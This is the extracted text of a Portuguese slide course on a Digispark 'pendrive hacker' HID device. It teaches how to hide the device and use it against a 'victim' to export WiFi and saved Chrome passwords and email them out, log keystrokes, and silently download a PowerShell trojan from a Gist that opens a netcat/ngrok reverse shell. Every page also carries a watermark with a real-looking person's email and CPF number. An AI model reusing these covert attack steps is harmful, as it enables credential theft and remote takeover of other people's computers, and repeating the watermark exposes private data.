Você está na página 1de 28

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


INTRO.TXT

PRÉ-REQUISITOS
Essa é a plaquinha que será
Seu computado
utilizada para criar e programar
Uma placa de circuito (digispark)
nosso pendrive hacker

O computador pode ser qualquer

um, desde que esteja rodando o

Windows (de preferência) para

instalarmos as ferramentas e os

drivers necessários.

Introdução ao Pendrive Hacker


Essa placa de circuito é mais conhecida como Arduino.

Ele foi criado para você fazer seus próprios projetos,

como:

→ casas inteligentes
Podemos usar extensões no Arduino.

→ apagar luzes sozinhas


Essas placas de circuito são feitas para

→ regadores automáticos serem personalizadas — você pode

e várias outras coisas. criar o seu próprio projeto.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


INTRO.TXT

RUBBER DUCKY

Como podemos fazer literalmente Com ele é possível realizar invasões

tudo...é óbvio que os hackers não iriam apenas plugando o “usb” numa porta.

deixar passar.
Infelizmente esse USB custa em
Foi assim que criaram o Rubber
torno de 800 a mil reais aqui no
Ducky. Esse gadget ficou tão famoso
Brasil.
que apareceu na série Mr. Robot.

GUIA DE COMPRA

Temos duas opções para conseguir

nosso arduino (Digispark)

1 - Comprando no exterior: opção

mais barata e mais demorada

2 - Comprando no Brasil: Um pouco


Vem com pinos pra colocarmos alguns
mais caro que no exterior (R$25,00 a
módulos — ou seja, é totalmente expansível.
R$30,00) com entrega mais rápida.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


criando o
pendrive hacker
o que é?

Um teclado, igual ao que usamos no pc Por isso, o pendrive hacker pode


ou notebook para digitar. Ele apenas não emular a digitação — como se fosse
possui a carcaça e as teclas. um teclado comum.

Possui o usb e os drivers, ou seja, a Com isso, podemos realizar ataques


forma como ele interpreta é igual a sem nenhum antivírus ou firewall
de um teclado. descobrir, fingindo ser uma pessoa
digitando.

ATAQUE HID

O ataque é chamado de Human Interface O Antivírus procura por algum arquivo,


Attack ou HID, ou seja, ataque de um vírus, aplicativo malicioso que pode
interface humana. estar rodando no seu pc.

São interfaces que recebem inputs de nós Ele não desconfia de você mesmo, de
mesmos, que supostamente seriam usuário digitando coisas no teclado.
confiáveis. Assim, podemos programar o digispark
para digitar coisas maliciosas.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CRIANDO O
PENDRIVE HACKER
ESCONDENDO O PENDRIVE HACKER
Existem outras formas de esconder a Fazemos isso usando um cabo
placa de circuito e realizarmos um extensor — plugamos ele de um
ataque, sem ninguém desconfiar. lado e do outro o cabo normal. Um
macho e fêmea.
Também podemos esconder eles em
OUTROS dispositivos, como: mouse,
teclado e controles.

PROGRAMANDO O PENDRIVE

Aqui vamos seguir algumas etapas:

1. Baixar a IDE

2. Fazer as configurações

3. Instalar os drivers

Vamos no site do arduino → software Podemos usá-la para compilar o código


→ downloads Arduino IDE e enviar pro nosso arduino.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CRIANDO o
pendrive hacker
CONFIGURAÇÃO

Primeiro passo: File → Preferences → É um código de um URL adicional para


Additional Boards Manager URLs: gerenciar as placas
digistump

Segundo passo: Tools → Boards →


Boards Managers: pesquisamos por
digispark e aparecerá Digistump AVR
Boards.

Assim instalamos todas as


configurações necessárias para
podermos interpretá-lo em nossa
IDE.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CRIANDO o
pendrive hacker
INSTALANDO OS DRIVERS

Dentro da plataforma, no módulo Vamos abrir o arquivo de 32 ou 64


“Programando o Pendrive Hacker” bits, dependendo do computador
você receberá um link com o
arquivo .zip do Digistump.

Assim, já estamos prontos para começar


a compilar nosso código.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CRIANDO o
pendrive hacker
COMANDOS BÁSICOS

A IDE do arduino vem com dois A IDE também possui dois botões na
códigos padrões — void setup() e barra superior, do lado esquerdo.
void loop().

Usaremos ambos com frequência


Ambas são funções, e iremos para salvar o código no nosso
escrever nosso código dentro delas. pendrive hacker.

Botão verificar — podemos salvar Botão carregar — aqui nós

nosso código do digispark. Verifica colocamos o código dentro do

se nosso código está correto ou se digispark: nós plugamos o usb

ele usou mais memória do que dentro do PC em até 60s.

deveria.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


INJETANDO
COMANDOS
INJETANDO COMANDOS
COM O DIGISPARK

Vamos abrir o nosso terminal Para isso, usaremos o arduino e


usando o Digispark da mesma alguns códigos importantes. São
forma que fizemos ao abrir eles:
manualmente.
1. SendKeyStroke

Windows + R → digitamos CMD 2. println

→ enter → comandos 3. SendKeyStroke

SendKeyStroke: Comando para


pressionar as teclas Windows + R

Println: Print com quebra de linha.


Esse comando digita “CMD” e dá
enter.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


INJETANDO
COMANDOS
PRINCIPAIS COMANDOS

DIR (DIRECTORY) - Lista nossos MKDIR (Make Directory) - Nos


diretórios todas as pastas que permite criar pastas através da
existem. linha de comando.

CD (CHANGE DIRECTORY) - Também é possível criar arquivos

Navega entre as pastas.

com o comando “echo”.

Podemos navegar pelo diterório DEL (DELETE) - Conseguimos


que desejarmos e até voltarmos deletar os arquivos criados.
nas pastas anteriores.

SHUTDOWN - Esse comando


pode desligar o computador,
reiniciar, fazer logoff e mais,
dependendo dos parâmetros
que forem passados.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
TROCANDO O BACKGROUND

Os códigos vão rodar diretamente no


powershell, um terminal extremamente
poderoso do Windows.

Como o digispark não pode armazenar O pc usa o Editor de Registro para as


arquivos como fotos, nós precisamos configurações de todo o sistema.
baixar o arquivo da internet através do
client.DownloadFile. Aqui fica tudo como as configurações
de plano de fundo, vídeo, drive, etc.
No nosso código você pode ver
comandos como reg add
“HKEY_CURRENT_USER”. Esses são
parâmetros de chaves de registro.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
TROCANDO O BACKGROUND

Vamos pegar essa imagem,


wallpaper, da internet.

Podemos usar o site chamado


imgur

Aqui, upamos nossa foto e


conseguimos a URL da mesma
para ser inserida no código do Assim, alteramos o nosso código

powershell. para ficar desta forma:

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
TROCANDO O BACKGROUND

Agora, podemos passar o nosso Esse código será “descarregado”


código para a IDE do Arduino. no pendrive hacker assim que
estiver pronto.

É importante também substituir as Então, basicamente o nosso código


aspas e a \ dentro do nosso código. está abrindo um navegador, baixando

“ é substituído por \”
uma imagem via URL, alterando isso

\ é substituído por \\ no registro do Windows e atualizando


no sistema.
Sabemos que o código está correto
quando a sintaxe dele fica toda azul.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
CAPTURANDO SENHAS WIFI

Vamos usar o terminal para


verificar a rede wireless e
exportar o arquivo com os dados
fornecidos.

É com esse comando export do


netsh que conseguiremos os
arquivos com os dados da rede e
senha WIFI.

Um dos nossos comandos do Esses arquivos serão enviados para


código do arduino é o “cd o nosso email. Por isso, vamos criar
$env:temp”. 2 emails: um de envio e outro de
recebimento.

Esse comando nos leva para um É recomendável usar um email


diretório de arquivos teste pois a senha dele será
temporários. Aqui conseguimos passada no nosso código.
baixar alguns arquivos.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
CAPTURANDO SENHAS WIFI

Vamos habilitar para apps menos Isso é necessário para termos


seguros acessarem nossa conta um email de envio e recebimento
do gmail de teste. dos arquivos.

Ele fará esse processo


conectando na rede do email
gmail pra enviar por meio do
protocolo smtp. Capturando Senhas do
Navegador

Geralmente é o lugar principal Nosso navegador é como um


onde os usuários guardam cofre — ele guarda todas as
acessos de sites como google, senhas que o usuário possui e
youtube, twitter, etc. deixou salva.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
Capturando Senhas do
Navegador

Precisamos que o nosso pendrive Podemos exportá-la onde o


hacker acesse o navegador com mesmo gera uma tabela .csv,
as senhas salvas. uma tabela, pra gente consultar e
utilizar depois.

O navegador possui uma função No caso do nosso código, não


de exportar senhas em um abriremos o powershell e sim o
documento. chrome.

Essa é a primeira parte do nosso


código, onde ele vai abrir o
executar e o google chrome.

Agora vamos precisar exportar as


senhas do navegador!

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
Capturando Senhas do
Navegador

Essas senhas ficam em um Assim, nós programamos o


endereço de URL

arduino para entrar nesse


endereço, digitando o exato
chrome://settings/passwords comando

Para navegarmos pelo site, além


do mouse, podemos usar a tecla
TAB. E isso podemos fazer
utilizando apenas o teclado.

[Lembre-se]
→ São 7 tabs e 3 enters para a

TAB = MOUSE: Troca os exportação e salvamento do

elementos

arquivo.

ENTER = Clique do mouse (KEY_TAB) e (KEY_ENTER)

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
Capturando Senhas do
Navegador

Lembrando que a pasta de Deixamos um nome e um


downloads de cada pessoa pode documento padrão pra ser salvo.
variar.
Digitamos senha.csv → 3 TABS
Por isso precisamos deixar uma
pasta fixa pra salvar no nosso Esse documento exportado, csv é
código. um documento de planilha.

Criando um Keylogger

O keylogger é muito utilizado em No caso da captura de senhas

ataques hackers através da pelo navegador, não

internet. conseguimos capturar


informações de cartões de
Consiste em capturar tudo o que crédito.
você está digitando através do
teclado. Para isso seria preciso usar um
keylogger.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS
Criando um Keylogger

Esse é um tipo de ataque Nesse módulo, dentro da


praticamente impossível de ser plataforma, você encontrará o
registrado pelo antivírus link com o código do powershell
para ser executado.

Vamos usar o powershell para Nesse código, nós criamos uma


executar nosso ataque função chamada Start-Keylogger.

Entendendo o keylogger
Muitos malwares usam Assim, quando essas condições

chamadas de API no Windows são atendidas o sistema é

(pela forma como o Windows se orientado a gravar tudo em um

comporta), para atuar no arquivo log. Daí o nome: key

sistema. (tecla) logger (log ou registrar).

No meio do código temos um loop while que


realiza algumas ações conforme as condições são
atendidas (true), como escanear os códigos ASCII
(cada letra corresponde a um código no teclado),
saber se a tecla está pressionada, etc.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


PRIMEIROS
ATAQUES PRÁTICOS

OUTROS SCRIPTS DE
ATAQUE

Temos diversos scripts Todos esses códigos são


disponíveis no Github e na interessantes pra entender como
comunidade, como: o sistema “funciona” e como
podemos usá-los de outras
maneiras para hackear algo, por
Forkbomb - executa uma função
exemplo.
que trava o computador.

Além de códigos que conseguem Você receberá acesso ao Github

fazer o computador falar, do Pendrive Hacker com diversos

utilizando a própria voz do scripts atualizados para estudar

Windows. e colocar em prática.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CONEXÃO REMOTA E
REVERSE SHELL

O QUE É CONEXÃO REMOTA?

Uma conexão remota é a mesma No terminal podemos usar o


coisa que uma conexão entre comando ping para vermos os
sites. pacotes sendo enviados na rede
para um determinado endereço
Entramos no youtube e nos
ou site, como o google.
conectamos ao servidor do
youtube.

Na conexão de um pc pra outro Diferentes serviços usam portas


pc, usamos um IP e uma porta. padrões, para facilitar essa
comunicação.

Para nos conectarmos de um Por exemplo — servidores web

dispositivo pra outro, fazemos HTTP usam a porta 80, mas

isso através das portas. servidores web com o procotolo


HTTPS utilizam a porta 443.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CONEXÃO REMOTA E
REVERSE SHELL

reverse shell

Vamos usar o netcat para realizar No reverse shell com netcat


o shell reservo na prática.

precisamos fornecer o endereço


IP para realizar a conexão e a
Uma ferramenta que consegue porta.
conectar computadores.

Se pegarmos um ip e uma porta Através do terminal, fazemoso


qualquer pra tentar conectar netcat ouvir.

nosso próximo pc, ele não vai


conseguir. Por exemplo: nc.exe -lvp 55
significa que ele está ouvindo a
Isso porque nosso pc não está porta 55, ou seja, está aberta
disponível para conexões. para conexão.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


CONEXÃO REMOTA E
REVERSE SHELL

reverse shell

O comando -l é usado para ouvir


Ou seja, o pc da vítima será nosso
O comando -v para mostrar dados
servidor que vai enviar os comandos
O comando -p para especificar a porta pro pc do hacker.

Na nossa reverse shell nós vamos PC DA VÍTIMA HACKEADO→ ENVIA


ouvir e executar no CMD através do PARA O PC DO HACKER
terminal (do pc) da nossa vítima.

Aqui vai uma demonstração


de shell reverso.

Essa conexão ocorre depois que


conseguimos acesso à máquina da
vítima de forma direta (como no caso
do pendrive hacker) ou através de
execução de código remoto. imagem do google

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


ATAQUES À
DISTÂNCIA

Criando um trojan

Aqui, vamos usar o powershell para Nosso trojan será rodado em segundo
criar o código do nosso trojan. plano.

Precisaremos hospedar nosso código O digispark faz o download do código,


e arquivo em um servidor online e executa ele no powershell e passa a
fazer o download usando o pendrive. escutá-lo com uma reverse shell no pc
da vítima, se conectando com o pc do
hacker.

Precisamos também esconder nossa Vamos usar o Gist Github para


tela no computador da vítima, é por hospedar e editar nosso código
isso que usamos um arquivo em sempre que quisermos de forma
formato .ps1 gratuita.

Assim, ele será hospedado para ser Vamos criar um gist secreto e gerar
baixado pelo digispark.
uma URL

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


ATAQUES À
DISTÂNCIA

injetando trojan no
digispark

No botão raw geramos nosso código


bruto e também a URL.

Vamos utilizar o código disponível na Além disso, vamos esconder


plataforma com o
nosso powershell com o
.DownloadString(‘https:/ /url/payload.ps1’); comando -windowsstyle
hidden e editar nosso código
Esse comando fará o download do arquivo
no Arduino.
com o código que atualizamos no Gist Github.

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


ATAQUES À
DISTÂNCIA

reverse shell na
prática

Para nosso shell reverso, vamos Esse comando nos retornará


usar uma ferramenta chamada um output com informações
Ngrok. de status, versão, a região e o
endereço que usaremos para

Vamos nos conectar com nossa realizar o ataque.

conta no terminal e executar o


comando ngrok.exe tcp 4444

A sessão “forwarding” é como se


fosse um “site” pra gente se
conectar

O bom de hospedar nosso script em Assim, podemos conectar esse


um site, como o gist github, é que pendrive em qualquer pc — ele será
podemos alterar o script direto no site conectado e retornará a conexão pro
e não precisamos ficar mudando o nosso pc remoto.
código do digispark

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


BÔNUS

HACKENADO UM PC COM O
CELULAR
Aqui vamos juntar todo o Vamos instalar o Termux no

conhecimento dos últimos nosso celular. Ele emula um

módulos em um ataque prático. terminal, parecido com o CMD do


computador.

Vamos usar o mesmo script das


outras aulas — o script que realiza
a conexão reversa (reverse shell).

Da mesma forma que no pc,


precisamos do ngrok para realizar
conexões externas.

Aqui, logamos na conta do ngrok e


deixamos o netcat escutando na porta
4444.

Agora, podemos editar nosso arquivo no


gist com as informações fornecidas pelo
ngrok e plugar nosso pendrive hacker no
dispositivo da vítima.
@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65


“Hacking is

our weapon”

@igdotdi

Sérgio Mello Medeiros - ssergiomello@gmail.com - CPF: 096.975.568-65

Você também pode gostar